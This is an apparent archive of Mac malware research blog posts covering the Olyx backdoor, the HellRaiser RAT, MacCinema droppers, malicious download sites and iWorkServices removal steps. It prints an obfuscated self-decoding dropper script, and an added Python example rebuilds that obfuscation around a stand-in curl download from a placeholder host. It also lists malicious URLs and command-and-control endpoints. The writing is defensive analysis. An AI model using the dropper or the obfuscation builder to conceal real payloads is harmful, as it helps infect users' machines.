Archive
Backdoor ‘Olyx’
In my last blog post I discussed the early features of the RAT ‘Blackhole’. Although it was then in its early stages, I find this type of offensive development interesting because these tools emerge and are distributed as hacking tools with a functional backdoor client-server mechanism.
Last month we spotted a new piece of malware, a backdoor server called ‘Olyx’. The file is a Mach-O binary, and traces of the working directory left inside it suggest that the author’s Mac user name is ‘yxl’. So that is where the name ‘Olyx’ came from.
Backdoor ‘Olyx’ was spotted in a package called ‘PortalCurrent events-2009 July 5.rar’, whose content suggests it was extracted from the Wikipedia community portal’s Current events page for 2009 July 5. If you visit that Wikipedia page and compare it with the screenshot below, you’ll find them very similar.
However, the extracted page includes a folder containing photos of the 15 June 2011 protest in Athens, Greece, alongside the two malicious binary executables:
There’s another folder called ‘Photo-Current events 2009 July 5’, which contains 21 (disturbing) photos.
Q: So, the question now is, what happened on ‘2009 July 5’?
The World Uyghur Congress website describes it:
On 5 July 2009, Uyghurs in Urumqi, the capital of East Turkestan, staged a peaceful protest which was suppressed by Chinese security forces and subsequently led to ethnic unrest in the city that left hundreds of people dead.
Q: OK, that was 2 years ago, right?
Yes, and a press release titled “Worldwide Uyghur Protests on Second Anniversary of 5 July 2009” describes the present:
On July 5, 2011 and in the days surrounding July 5th, the WUC called the Uyghurs in exile and their supporters around the globe to stage demonstrations and other actions to commemorate the second anniversary of one of the saddest and most tragic days in the history of the Uyghur people and of East Turkestan and to ensure that the world does not forget about the devastating plight of the Uyghur people.
So there is a call for organized demonstrations to remind the whole world of the 2009 event, in support of Uyghur human rights and freedom.
Q: What is the protest about? This Facebook invitation page explains:
Approaching the second anniversary of these events, and despite international calls, no independent investigation into the incident has been allowed by the Chinese authorities and the number of people killed, detained, imprisoned, executed and disappeared remains unclear.
The activity surrounding this protest clearly spilled over into cyberspace, resulting in attacks, as described in the press release titled “World Uyghur Congress (WUC) Victim of DDoS Cyber Attacks”:
Approaching the second anniversary of the 5 July 2009 events, the World Uyghur Congress (WUC) has again been the victim of cyber attacks.
So, how do you think Backdoor ‘Olyx’ fits into this picture?
The discovery of this threat should remind Mac users to think carefully about security and about the real-life consequences of getting pwned. Remember, this type of threat is on a mission: this is not a cybercriminal operation that monetizes infections or steals money.
How to Remove Starfield
1) Kill the running processes.
Using Spotlight, type Activity Monitor, filter by searching for starfieldUpdate and click Quit Process. Then search for offSyncService and click Quit Process.
If you are using Terminal, you may run the following command:
2) Delete the Starfield internet plugins and components.
Using Terminal, you may run the following command:
3) The root password is required to remove the following files.
These instructions remove all traces of Starfield. Stay safe!
**Note: If you find the Starfield application useful, you may keep ‘WBE Desktop Notified.App’ and ‘DesktopTools.App’.
RAT for Mac
RAT for Mac?
With so many RATs (Remote Administration Tools) available for Windows, people wonder whether there is a good and useful RAT for Mac as well.
The searches and discussions about this topic go on and on; at one point an online poll favored continuing the development:
A useful description of RATs that work on OS X can be found here.
The most recent/updated development is HellRaiser version 4.2, coded by DCHKG, an underground Mac programming team.
HellRaiser includes a configuration component, where the remote controller specifies the server parameters.
The server component is the application distributed to the target OS X user. It has to be executed manually to install; once installed, the server runs in the background (hidden from the Dock) and the server component (or ‘slave’) reports back to the master, as shown below.
This is the same version that Intego recently discovered in the wild, disguised as an iPhoto installer.
How would I know if the HellRaiser server is installed or running?
Option 1: Open Network Utility and Activity Monitor (/Applications/Utilities/), identify the process and kill it.
Option 2: Open Terminal and type lsof -i (this lists running processes together with their matching network/internet connections). Look for a dubious name or connection, take note of its PID, then type kill -9 <PID> in Terminal to kill the process.
If you’re using a Mac security scanner, now is the time to check for a signature update (most vendors detect this as OSX HellRTS).
Updated MacCinema
Last week I spotted a modified version of MacCinema. The change was not significant; the modification was purely to avoid detection by scanners.
The script looks like this:
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala
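To make that pipeline concrete, here is an added Python example of my own, not code from the post or from the malware. It builds a stand-in tail of the same shape (every line mirrored character by character as the sed one-liner does, line order mirrored as tail -r does, and the reversed uuencode header ‘nigeb’ disguised as ‘lala’), then undoes it exactly the way the wrapper above does before applying the applemac/bsd/gnu substitutions to the decoded script. The ‘zigazaga’ name, the 666 mode and the placeholder strings come from the script above; the payload text is constructed for the demo. The reversed-header trick is also what the ‘yksrepsak 777 nigeb’ and ‘enialbdivad 777 nigeb’ strings in the later variants are.

```python
import binascii

# Names below are taken from the wrapper script quoted above; the payload text
# used in __main__ is a constructed stand-in, not the real second stage.
UU_NAME = "zigazaga"
PLACEHOLDERS = {b"applemac": b"AdobeFlash", b"bsd": b"7037"}


def sed_sub(text, old, new):
    """sed 's/old/new/' semantics: first occurrence on each line only (str or bytes)."""
    nl = "\n" if isinstance(text, str) else b"\n"
    return nl.join(line.replace(old, new, 1) for line in text.split(nl))


def uuencode(payload: bytes, name: str = UU_NAME, mode: str = "666") -> list:
    """Classic uuencode: header, 45-byte data lines, a '`' empty line, then 'end'."""
    lines = [f"begin {mode} {name}"]
    for i in range(0, len(payload), 45):
        lines.append(binascii.b2a_uu(payload[i:i + 45]).decode("ascii").rstrip("\n"))
    lines += ["`", "end"]
    return lines


def uudecode(lines: list) -> bytes:
    if not lines or not lines[0].startswith("begin "):
        raise ValueError("missing uuencode header")
    out = bytearray()
    for line in lines[1:]:
        if line == "end":
            return bytes(out)
        if line not in ("", "`"):
            out += binascii.a2b_uu(line)
    raise ValueError("missing 'end' line")


def obfuscate(payload: bytes) -> str:
    """Build the dropper's tail: uuencode, mirror each line, mirror the line order,
    then disguise the reversed 'begin' header ('nigeb') as 'lala'."""
    mirrored = [line[::-1] for line in uuencode(payload)][::-1]  # 'dne' comes first
    mirrored[-1] = mirrored[-1].replace("nigeb", "lala", 1)     # 'agazagiz 666 lala'
    return "\n".join(mirrored)


def deobfuscate(blob: str, argc_was_one: bool = False) -> bytes:
    """Replays the one-liner:  sed 's/lala/nigeb/' | <sed line reverse> | tail -r |
    uudecode, then the sed edits the dropper applies to the decoded script."""
    lines = sed_sub(blob, "lala", "nigeb").split("\n")
    lines = [line[::-1] for line in lines][::-1]
    script = uudecode(lines)
    for old, new in PLACEHOLDERS.items():
        script = sed_sub(script, old, new)
    # sed 's/gnu/'$type'/' : type is 1 when the dropper was run with exactly one argument
    return sed_sub(script, b"gnu", b"1" if argc_was_one else b"0")


if __name__ == "__main__":
    stand_in = b"#!/bin/sh\n# constructed stand-in payload\ncurl -o applemac http://example.invalid/bsd gnu\n"
    blob = obfuscate(stand_in)
    print(blob)                         # ends with 'agazagiz 666 lala', like the post
    print(deobfuscate(blob).decode())
```

Run it as a script to see the dropper-shaped blob and the recovered stand-in. The `tail -53 $0` step and the `uname -p` scratch file from the real one-liner are left out here because they only matter when the blob is appended to the script that decodes it; note that lowercase letters never occur in uuencoded data, so the ‘lala’ rewrite can only ever hit the header line.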
Anyway, this backdoor trojan is massively distributed around the internet. It relies on Google SEO, so most users stumble onto these malicious sites from Google search results.
Some lure Mac users by promising free downloads of full versions of software, cracks, serials, activators, generators, keys and fixes, just like the screenshot below.
…while others link to Mac videos, like this PornTube below.

Some malware-serving sites are a bit more aggressive: instead of asking the user to download the DMG file, they download and mount it automatically. Since the Safari setting that allows this is turned on by default, you can disable it by following these instructions:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ‘safe’ files after downloading” box
5. Close Safari’s preferences
These instructions have been discussed here previously.
Stay safe!
MacCinema slight modification
A slightly modified variant of MacCinema was spotted in “MacPlay.dmg”. Once you execute it, it still displays the MacCinema installer. However, a few modifications were found in the preinstall and preupgrade scripts, as shown in Figure 01.
Obviously, the attackers are trying to stretch the life of these threats. The obfuscated data extracts another script, which we have already seen in the previous variant.

This Trojan has been in the wild for months now, and as it continues to proliferate across the internet, new Macintosh users are often found falling for its tricks.
Stay away from this threat!
“MacCinema” update …
Another modified version of “MacCinema” is posing as a cracked version of “Avid.Xpress.Pro.5.7.2.dmg”.
This variant was recently added by MacScan; if you’re using it, do a regular check here -> http://macscan.securemac.com/spyware-list
Also, recently blogged by Intego @ http://blog.intego.com/
What’s new? Nothing really, except these few strings: “yksrepsak 777 nigeb”

…which, read backwards, is “begin 777 kaspersky”, the header line of a uuencoded block.

“enialbdivad 777 nigeb” remains the same as discussed in the previous post “Latest Threat: MacCinema“.
The bottom line here is that these threats are active and in the wild. They are playing hide-and-seek with security scanners by applying obfuscation and changing a few strings.
To remove this threat, just follow the MacAccess removal instructions.
Stay alert and always be informed!
Bloated Fish

This picture is the result of visualizing data gathered from one malicious node, 75.126.154.249. Hundreds of active domain names share this IP address, as denoted by the green lines. The red lines inside the body of the “Bloated Fish” denote malicious links. These red lines connect to the fish’s pink and red lips, labelled “http://self-relax-massage.com/relax/in.cgi?”. At the moment, the malicious server leads to its payload, “http://great2008x.com/great/pdf.php?id”, which generates an exploit PDF that installs an EXE, targeting users whose default browser opens Adobe Reader automatically.
As observed and mentioned several times, these malicious PDFs have been quietly increasing in number; recently, however, there has been a significant jump due to the implementation of PHP-generated PDFs, apparently a form of server-side polymorphism, which means the generated PDF changes every time. This makes life difficult for security scanners that rely on detecting specific files.
Notice the fish’s tail: a few red lines lead to the “MacAccess” trojan. As of writing, they all point to “http://opera-power.com/download/7946645975673d6cc63775/flashcodec.dmg”. As usual, it is disguised as a fake codec. Here’s an example below…

“These bloated fish call the cloud their home.”
Latest OS X threat Krowi installs “DivX”
The latest update of the Krowi threat was found in an Adobe Photoshop crack installer.
Not much difference from “iWorkServices” except for the repackaging and the name. However, this should serve as a reminder to be extra careful when downloading stuff!


Once installed, you’ll find the files and port activity shown below.

How to remove it? Same as the previous instructions, except that you have to change the name from “iWorkServices” to “DivX”.
How To Remove “iWorkServices”
I noticed that some of the traffic coming in is from people looking for how to remove “iWorkServices”.
So, here are the manual, “do it yourself” steps:
Open Terminal -> /Applications/Utilities/Terminal.app
1. Check whether “iWorkServices” is running. You can choose any of the options below:
**Note: These commands require root privileges to execute; to avoid re-entering your password every time, type -> “sudo su“.
- Check for a running “iworkservices” process by typing “lsof -c iwork” or “lsof -c iWork“ (lsof -c matches the start of the command name and is case sensitive, so check which one works for you).

Monitoring “iWorkServices” background activity, you will notice the TCP connections changing as it tries to communicate with 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024.

1.1 If you know the PID (process ID), typing “lsof -p <PID>” will give the same result.
2. Since we have confirmed the presence of this threat on the system, you can start removing it by executing the following commands:
rm -rf /System/Library/StartupItems/iWorkServices
rm /usr/bin/iWorkServices
rm /private/tmp/.iWorkServices
rm -rf /Library/Receipts/iWorkServices.pkg
killall -9 iWorkServices
2.1 Or you can copy the same instructions into a small bash script, as in the example below:
#!/bin/bash
# Simple script to delete the iWorkServices files and terminate the running process.
# Run it as root (sudo su); otherwise the rm and killall commands will fail.
rm -rf /System/Library/StartupItems/iWorkServices   # startup item that launches it at boot
rm /usr/bin/iWorkServices                           # the binary itself
rm /private/tmp/.iWorkServices                      # dot-file it drops in /private/tmp
rm -rf /Library/Receipts/iWorkServices.pkg          # installer receipt
killall -9 iWorkServices                            # stop the copy that is still running
exit
You can write these instructions in any text editor, such as TextEdit (/Applications/TextEdit.app).

Open Terminal and type “chmod +rwx <filename>”, as in the example below. **Notice that I am the root user here, so don’t forget to type “sudo su“ so your script executes properly.**
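The three manual checks on this page (Starfield’s starfieldUpdate and offSyncService processes, the “dubious name and internet connection” hunt for HellRaiser with lsof -i, and lsof -c / lsof -p for iWorkServices) all boil down to the same triage: read lsof’s network listing and match either the process name or the remote endpoint against what you know is bad. Here is an added Python helper of my own, not part of the original posts, that does exactly that. The watched process names and the 69.92.177.146:59201 endpoint come from the posts above (DivX is on the list only because the Krowi variant uses that name, so expect false positives if you run legitimate DivX software); the lsof lines it parses are constructed for the demo, and running lsof with `+c 0` so command names are not truncated is my assumption about how you would capture the real thing.

```python
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional

# Process names given in the posts above (Starfield, iWorkServices, its Krowi/DivX repack).
# HellRaiser has no fixed name, which is why the remote-endpoint check exists as well.
WATCHED_NAMES = {"starfieldUpdate", "offSyncService", "iWorkServices", "DivX"}
# Command-and-control endpoint observed for iWorkServices in the post above.
WATCHED_ENDPOINTS = {"69.92.177.146:59201"}

# Constructed sample shaped like `lsof -i -n -P +c 0` output; not a real capture.
SAMPLE_LSOF = """\
COMMAND         PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
Safari          812 mark   19u  IPv4 0x1a2b3c4d5e6f7081      0t0  TCP 192.168.1.20:52110->93.184.216.34:443 (ESTABLISHED)
iWorkServices   933 root    3u  IPv4 0x1a2b3c4d5e6f7082      0t0  TCP 192.168.1.20:52111->69.92.177.146:59201 (ESTABLISHED)
offSyncService 1045 mark    5u  IPv4 0x1a2b3c4d5e6f7083      0t0  TCP *:1033 (LISTEN)
mdnsresponder   101 _mdns   7u  IPv4 0x1a2b3c4d5e6f7084      0t0  UDP *:5353
"""

# COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME [(STATE)]
LINE_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+"
    r"(?P<proto>TCP|UDP)\s+(?P<name>\S+)(?:\s+\((?P<state>[A-Z_]+)\))?\s*$"
)


@dataclass
class Conn:
    command: str
    pid: int
    user: str
    proto: str
    local: str
    remote: Optional[str]   # None for listening or unconnected sockets
    state: Optional[str]


def parse_lsof(text: str) -> List[Conn]:
    """Turn lsof -i lines into Conn records; the header and unparsable lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        local, _, remote = m.group("name").partition("->")
        conns.append(Conn(m.group("cmd"), int(m.group("pid")), m.group("user"),
                          m.group("proto"), local, remote or None, m.group("state")))
    return conns


def suspicious(conns: List[Conn]) -> List[Conn]:
    """Flag a socket when its process name or its remote endpoint is on a watchlist."""
    return [c for c in conns
            if c.command in WATCHED_NAMES or c.remote in WATCHED_ENDPOINTS]


def kill_commands(conns: List[Conn]) -> List[str]:
    """The `kill -9 <PID>` lines the posts suggest, one per PID, for review before running."""
    return [f"kill -9 {pid}" for pid in sorted({c.pid for c in conns})]


def live_lsof() -> str:
    """Capture lsof from this machine (run as root to see other users' processes)."""
    return subprocess.run(["lsof", "-i", "-n", "-P", "+c", "0"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    hits = suspicious(parse_lsof(SAMPLE_LSOF))
    for c in hits:
        print(f"{c.command} (pid {c.pid}, {c.user}) {c.proto} {c.local} -> "
              f"{c.remote or '-'} {c.state or ''}")
    print("\n".join(kill_commands(hits)))
```

Swap `SAMPLE_LSOF` for `live_lsof()` to run it against the machine in front of you. The helper only prints the kill commands rather than executing them, so you can check what a hit is before you terminate it; once the process is gone, the file removal steps above still have to be carried out, otherwise the startup item brings it back on the next boot.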


Please feel free to drop me a message, hopefully with additional information such as:
- How did you get infected? (Which website?)
- Do you still have a copy of the application you installed? If yes, please send it to this email address: meths101 (at) optusnet (dot) com (dot) au, or just send me a link where I can download it.
- Any unusual behaviour found on your computer.
Happy Holidays!!! –> As of writing, it is a nice, sunny Australia Day today, and I still feel sleepy from watching the Australian Open last night. It was fun and an amazing crowd!

Remote Download: PermissionResearch.zip